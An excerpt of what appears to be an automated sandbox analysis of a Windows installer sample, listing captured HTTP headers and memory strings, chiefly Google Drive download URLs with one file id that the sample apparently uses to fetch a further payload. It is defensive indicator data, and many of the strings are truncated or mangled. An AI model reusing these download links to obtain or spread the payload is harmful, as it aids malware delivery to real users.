1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR44WzFMtJklLZE7-HXmMu3WMgfHx6lgKfkbJbyTzgpthAyeMlE5sOCkcdaGcbczcTpuUHHOc8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:35 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VbidvOdMJnZfCX0n9sGQ0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQYsitrk7M_hOWuHD9TZcQS9bg28596iS2e1xQb7L5hgTRAqzMWwkGFFjMJyDowChgcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:07:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-t3WNlEsGsc5xQtNeaaTF5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: QNuQ5e175D.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803318830.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1982340373.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903559932.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1915165952.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1655548219.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=d
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download1
      Source: QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download9
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloads
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadt
      Source: QNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Nr
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: QNuQ5e175D.exe, 00000003.00000003.1642418562.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
      Source: QNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870054618.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892558538.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1915071176.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925952115.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870002480.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: QNuQ5e175D.exe, 00000003.00000003.1915165952.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=do
      Source: QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1712715094.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ube.
      Source: QNuQ5e175D.exe, 00000003.00000003.2149994791.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2161768153.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2172691631.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2582957401.0000000033120000.00000004.00001000.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MG
      Source: QNuQ5e175D.exe, 00000003.00000003.2161768153.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2172691631.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MKu5mJyfAs6YSv-M
      Source: QNuQ5e175D.exe, 00000003.00000003.2149994791.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MP
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MY
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-Mm
      Source: QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1605210077.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768510854.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1735078700.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1712715094.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870054618.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: QNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2149994791.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642418562.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1605210077.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
      Source: QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download/
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download1
      Source: QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download55
      Source: QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1678008587.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download6a
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download9
      Source: QNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2060093323.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2400667927.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadFq
      Source: QNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2004745335.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2060093323.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2049232170.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2015717613.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadWq
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download_
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloada
      Source: QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloaddq
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadid
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadnn
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadpw
